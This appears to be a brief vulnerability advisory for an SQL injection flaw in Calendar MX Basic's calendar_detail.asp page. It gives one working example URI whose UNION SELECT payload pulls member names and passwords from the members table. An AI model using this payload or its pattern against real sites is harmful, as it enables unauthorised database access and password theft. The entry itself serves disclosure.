Calendar MX Basic Calendar_Detail.ASP SQL Injection Vulnerability

Calendar MX Basic Calendar_Detail.ASP SQL Injection Vulnerability

An attacker can exploit this issue via a web client.

The following example URI is available:

http://www.example.com/calendar_detail.asp?ID=-1%20union%20select%200,M_FIRST,M_PASSWORD,0,0,0,0,0,0,0,0,0,0,0,0%20from%20members%20where%20id%20like%201[[/SQL]]